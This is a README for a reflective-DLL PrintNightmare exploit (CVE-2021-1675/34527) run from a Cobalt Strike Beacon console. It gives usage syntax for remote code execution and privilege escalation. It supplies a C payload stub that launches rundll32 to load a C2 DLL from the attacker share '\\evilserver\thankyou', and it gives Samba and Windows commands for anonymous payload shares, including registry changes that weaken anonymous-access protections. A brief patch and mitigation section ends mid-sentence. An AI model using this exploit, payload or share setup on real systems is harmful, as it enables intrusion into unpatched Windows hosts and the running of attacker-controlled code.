CVE-2021-1675 / CVE-2021-34527 exploit.
Reflective Dll implementation of the PrintNightmare PoC by Cornelis de Plaa (@Cneelis). The exploit was originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370).
This implementation has some advantages compared to other public exploits:
Within Cobaltstrike Beacon console:
PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]
The payload DLL is started by spoolsv.exe (print spool service) from DllMain and should thus avoid API calls which require synchronisation to avoid deadlocks. We recommend to let this payload DLL perform a CreateProcess call to something like this:
void NothingToSeeHere() {
STARTUPINFO sui;
PROCESS_INFORMATION pi;
RtlZeroMemory(&sui, sizeof(sui));
RtlZeroMemory(&pi, sizeof(pi));
sui.cb = sizeof(sui);
GetStartupInfo(&sui);
LPCWSTR lpwApplicationName = L"C:\\Windows\\System32\\rundll32.exe";
LPWSTR lpwCommandLine = (LPWSTR)L"C:\\Windows\\System32\\rundll32.exe \\\\evilserver\\thankyou\\c2payload.dll,MyExport";
if (!CreateProcess(lpwApplicationName, lpwCommandLine, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &sui, &pi)) {
return;
}
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return;
}
Screenshot 1: using this exploit for RCE
Screenshot 2: using this exploit for LPE
SMB server configuration
Source: https://github.com/cube0x0/CVE-2021-1675#smb-configuration
Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
From windows it's also possible:
mkdir C:\share
icacls C:\share\ /T /grant Anonymous logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
This project is written in C and assembly. You can use Visual Studio to compile it from source. We are not releasing binaries, so you will have to compile yourself.
In July 2021 Microsoft released an emergency update to fix the PrintNightmare vulnerability (CVE-2021-34527). Make sure you run Windows update and install the following update:
For more information, see Microsoft guidance:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
This patch also offers the ability to prevent non-administrators from installing any print drivers on a print server (incl. signed drivers), by configuring the “RestrictDriverInstallationToAdministrators” registry value. For information on this option, see:
Other option to mitigate the PrintNightmare vulnerability includes: